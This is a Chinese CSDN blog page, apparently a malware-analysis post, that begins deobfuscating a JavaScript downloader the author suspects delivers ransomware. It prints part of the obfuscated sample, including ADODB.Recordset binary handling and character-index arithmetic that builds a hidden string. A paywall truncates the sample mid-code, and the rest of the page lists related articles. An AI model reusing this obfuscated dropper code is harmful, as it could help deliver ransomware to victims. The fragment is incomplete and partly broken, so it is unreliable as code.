js混淆还原工具_[原创JS混淆downloader代码还原

最新推荐文章于 2024-06-02 09:59:37 发布
最新推荐文章于 2024-06-02 09:59:37 发布
阅读量407 收藏
点赞数
文章标签: js混淆还原工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39683241/article/details/111532126
版权
本文介绍了如何分析和还原混淆的JavaScript代码,通过动态调试方法揭示了一个downloader的原始代码。在过程中,遇到了ActiveXObject在不同浏览器中的问题,并提供了解决方案。最终,成功还原了代码,发现下载的内容可能是勒索软件。
摘要由CSDN通过智能技术生成

好久没发贴了,来水一贴吧。

1.样本代码function UP(m)

{

var nUX = "charA";

var luz = "t";

var c = nUX + luz;

return c;

}

function AU()

{

var uxJ = "YkuOKC7i{\"GUy%x}2c9N*Q+";

return uxJ;

}

function pvL(F, oc, rt)

{

var M = new oc("ADOD" + "B.Re" + "cordset");

var hTR = F["Si" +"ze"];

var K = 201;

M["f" + "ie" + "lds"]["a" + "pp" + "e" + jG()]("bin", K, hTR);

var ka = "ope";

M[ka + "n"]();

M["addNew"]();

var X = "bin";

var D = "appendChunk";

M(X)[D](rt);

var vvJ = "updat";

M[vvJ + "e"]();

return M(X)["value"];

}

function vWs()

{

var uxJ = "8tneM[`S^W

return uxJ;

}

function og()

{

var uxJ = "p_@|VJfw6z=R;A)mj5Za31Hs!o->F.~&\\4X]dbh";

return uxJ;

}

function U(f)

{

var uxJ = AU() + vWs() + og();

var Rp = uxJ["" + UP(f)](f-31);

return Rp;

}

function RIO()

{

var y=U(8000/64+0)+U(1100/20-0)+U(5*11);

y+=U(3480/40-0)+U(551-441)+U(5*17);

y+=U(780/10-0)+U(670-592)+U(43);

y+=U(343-231)+U(3201/97-0)+U(4623/67+0);

y+=U(2*19)+U(1680/30-0)+U(8*7);

y+=U(3*19)+U(1043-974)+U(4284/63+0);

y+=U(43)+U(4*29)+U(8*7);

y+=U(584/8-0)+U(6*13)+U(2726/29-0);

y+=U(3480/40+0)+U(1695/15+0)+U(545-497);

y+=U(787-675)+U(93-37)+U(5*11);

y+=U(3819/67+0)+U(8*7)+U(483-428);

y+=U(5772/74+0)+U(5*11)+U(4250/34+0);

y+=U(778-721)+U(6*17)+U(3534/62+0);

y+=U(461-351)+U(6786/87-0)+U(596-541);

y+=U(6204/66+0)+U(5415/95-0)+U(420-364);

y+=U(3410/62-0)+U(43)&

最低0.47元/天 解锁文章
weixin_39683241
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
js混淆还原工具_JS混淆顶象greenseer一键还原
weixin_39713219的博客
12-03 1004
因为我的粗心大意,改了某些东西后,导致验证码脚本跑不起来了。以为是顶象更新了。直接追本溯源,自己手写了个ast,还原顶象,亲测可以在浏览器上完美替换运行。上次说无感验证消失了,其实也是我粗心,有个请求忘记加代理ip和更改请求头了,也把对方想的太牛逼了。这次对代码进行了全面检查,改进了一下代码,直接完美运行。先上图装杯,他们的检测感觉大部分是唬人的哈哈。轨迹也没做很...
js混淆还原工具_JavaScript(JS) 压缩 / 混淆 / 格式化 批处理工具
weixin_39580042的博客
12-19 1355
因此今天我把它json化了.用json传输数据,也开放了api本工具所有的功能实现都是由http://jscompress.sinaapp.com/api处理.(包括现在可以使用的这个在线压缩)所有的数据交换均由 HTTP POST 输入处理后由 json 作为数据输出格式.API参数 : http://jscompress.sinaapp.com/api?get={type}&cod...
AST反混淆js还原工具2.2(20230203)
02-03
混淆工具主要实现的目的 1.尽量保证原来js文件的可执行性 2.反混淆后尽量接近源码的可读性 介绍 1.基于丁仔大佬js还原工具进行的二次开发,增加功能多达10+, 2.对丁仔大佬已开发的功能进行优化及修改,兼容更多可能,提升兼容性。 3.对1.0版本已存在的错误进行修复 4.修复已知bug,增加功能与兼容性
JS混淆还原工具
07-05
JS混淆还原工具
Unminify:JavaScript源代码还原利器
最新发布
gitblog_00025的博客
06-02 385
Unminify:JavaScript源代码还原利器 unminifyreverse many of the transformations applied by minifiers and naïve obfuscators项目地址:https://gitcode.com/gh_mirrors/un/unminify 在JavaScript开发中,为了减小文件大小,提高加载速度,我们会对代码进...
技术分享:几种常见的JavaScript混淆和反混淆工具分析实战
热门推荐
兰亭古墨
04-20 3万+
信息安全常被描述成一场军备竞赛,白帽与黑帽,渗透测试者与黑客,善与恶,本文将聚焦这场永无止境决斗中的一个小点。HTML5 & JS 应用中充满着对输入进行验证/注入的问题,需要开发人员始终保持警惕。但同时还存在着另一个问题,就是应用中程序专用代码的易访问性。为了防止盗版或者至少使盗版更加困难,常会使用混淆工具JS 代码进行混淆。作为对立面,反混淆工具也可以将混淆过的 JS 代码进行还原...
js混淆还原工具_js混淆代码还原js混淆:利用js进行赋值实现
weixin_39943750的博客
12-19 612
早上需要修改一个js,发现被混淆了,有没有“源码”,网上也没有找到合适的工具进行反混淆,研究了一下,整理以下两种方式【不想用工具的直接看方法二】方法一:利用IE开发人员工具(IE8开始已经自带,IE7以前需要下载安装IE Developer Toolbar)进行反混淆,本人常用Chrome,但是没有找到利用Chrome自带的开发人员工具去实现反混淆的方法。。。希望哪位园友知道告知。。。不罗嗦,直接...
蓝讯下载工具_Downloader_v1.3.7.zip
12-29
【蓝讯下载工具_Downloader_v1.3.7.zip】是一个专为中科蓝讯蓝牙SDK开发设计的实用工具,其版本号为1.3.7。该工具的主要功能包括程序下载、调试打印以及批量下载样机,是开发者在进行蓝牙相关应用开发时不可或缺的...
icloud_photos_downloader:从iCloud下载照片的命令行工具
04-01
一个用于下载所有iCloud照片的命令行工具。 在Linux,Windows和MacOS上均可使用。 作为运行,以保留照片和视频的本地备份。 该工具由志愿者开发和维护(我们一直在寻求...)。 如果有值得提供的东西,我们的目标...
SmartGet_1.53_SmartGet_downloader_
10-02
标题“SmartGet_1.53_SmartGet_downloader_”指的是SmartGet 1.53版本的下载管理器,这是一款专为提高下载效率和隐私保护设计的工具。SmartGet是一个智能下载软件,它允许用户通过特定的编码(可能指的是URL哈希或...
Jio-Saavn-Downloader-master_JioSaavn_javascript_11jiocom_
10-01
【标题】"Jio-Saavn-Downloader-master" 指的是一款专为JioSaavn音乐平台设计的下载工具的源代码仓库。这个项目基于JavaScript编程语言,目的是帮助用户下载JioSaavn上的音频内容。"11jiocom"可能是项目的另一个别名...
AST反混淆js还原工具2.0.zip
04-20
1.基于丁仔大佬js还原工具进行的二次开发,增加功能多达10+, 2.对丁仔大佬已开发的功能进行优化及修改,兼容更多可能,提升兼容性。 3.对1.0版本已存在的错误进行修复 4.针对最新的https://obfuscator.io/混淆规则进行针对性处理 5.提升部分功能的兼容性 6.新增三元表达式转if-else功能,解决原版涉及的作用域问题 目前可处理2022-4-20当前最新的https://obfuscator.io/中的混淆规则,是js逆向与爬虫工程师的应对js混淆的不二神器
AST反混淆js还原工具.zip
09-23
基于丁仔大佬js还原工具进行的二次开发,增加功能多达10+,对丁仔大佬已开发的功能进行优化及修改,兼容更多可能,提升兼容性。目前可处理2021-9-23当前最新的https://obfuscator.io/中的混淆规则,是js逆向与爬虫工程师的应对js混淆的不二神器
js、css代码批量混淆工具源码
05-09
1、本工具采用C#软件进行编码。 2、能批量混淆JavaScript、css代码 3、本程序需要安装java环境才能正常使用 4、本程序能自动识别是否为 JavaScript和css文件,不是此类文件自动复制 5、本程序解决,由于编译器不能批量进行文件混淆,本程序支持批量程序混淆。 6、提供可执行文件和源码以供编程人员学习和交流
wx-downloader_downloader_
10-01
- `wx-downloader`是一个针对Node.js的下载工具模块,它提供了方便的API来处理文件下载任务。 - 这种模块通常会利用HTTP/HTTPS等协议来请求远程资源,并将其保存到本地。 3. **异步编程** - 在Node.js中,由于大...
js混淆还原工具_js混淆解密 还原混淆方法
weixin_39905725的博客
12-19 1271
方法一:利用IE开发人员工具(IE8开始已经自带,IE7以前需要下载安装IE Developer Toolbar)进行反混淆。方法二:混淆后的测试代码:eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){w...
在线一键JS混淆还原
mxd01848的博客
02-17 8018
字符串混淆是一种将字符串中的字符替换为其他字符的混淆技术。例如,将字符串“hello world”中的字符“h”替换为“5”,将字符“e”替换为“3”,以此类推。下面,我们将介绍一些常见的混淆技术和如何使用JSJiaMi进行混淆和解密。函数和变量名混淆是一种将函数和变量名替换为随机字符串的混淆技术。例如,将函数名“hello”替换为“a1b2c3”,将变量名“world”替换为“d4e5f6”。这使得代码难以理解和修改。这段代码使用了常见的函数和变量名,如“helloWorld”、“x”、“y”和“i”。
JS混淆|一招废掉所有ob混淆一键还原工具
Python3 爬虫实战 1:应对特殊字体,爬取猫眼电影实时排行榜
12-20 3482
关注它,不迷路。 本文章中所有内容仅供学习交流,不可用于任何商业用途和非法用途,否则后果自负,如有侵权,请联系作者立即删除!1.需求最近有小伙伴问我如何保护自己的js代码,我说你直接用 在线的 ob 混淆工具不就行了。他说还原工具太多了。其实写个插件稍微改一下特征就行了。2.分析下面我来抛砖引玉,看看如何写插件来修改特征。打开 ob 混淆官网:https://obfuscator.i...
基于Babel对JS代码进行混淆还原操作
kuizuo12的博客
02-01 3829
自写在线混淆还原网站 JS代码混淆还原 (kuizuo.cn) 还原前言 AST 仅仅只是静态分析,但可以将还原出来的代码替换原来的代码,以便更好的动态分析找出相关点。在还原时,并不是所有的代码都能还原成一眼就识破代码执行逻辑的,ast 也并非万能,如果你拥有强大的 js 逆向能力,有时候动态调试甚至比 AST 静态分析来的事半功倍。 还原不出最原始的代码 标识符是可以随便定义的,只要变量不冲突,我可以随意定义,那么就已经决定我们还原不出源代码的变量名,所以能还原的只有一些花指令,使其代码变好看,方
sec_edgar_downloader库读取的财报
11-13
sec_edgar_downloader库是一个用来从美国证券交易委员会(SEC)网站下载财务报告的Python库。它可以用来获取上市公司在SEC网站提交的10-K、10-Q等财务报告文件。 通过sec_edgar_downloader库,用户可以指定感兴趣的公司名称或股票代码,从而下载该公司在SEC网站上的财务报告。下载的财务报告可以是以HTML、文本或者PDF格式的文件,用户可以根据自己的需求选择相应的格式。 通过这个库,用户可以方便地获取上市公司的财务报告信息,可以用于进行财务分析、投资决策或者学术研究。借助这些财务报告,用户可以了解公司的经营情况、财务状况、盈利能力等重要信息,从而更好地进行投资分析和决策。 sec_edgar_downloader库的使用简单便捷,可以节省用户大量的时间和精力,避免了手动从SEC网站上下载财务报告的繁琐过程。同时,该库还提供了一些便捷的功能,如通过指定时间段或者特定报告类型进行筛选下载,使用户更加灵活地获取所需的财务报告信息。 总之,sec_edgar_downloader库的出现为用户带来了方便快捷的财务报告下载方式,为投资分析和决策提供了重要的数据支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值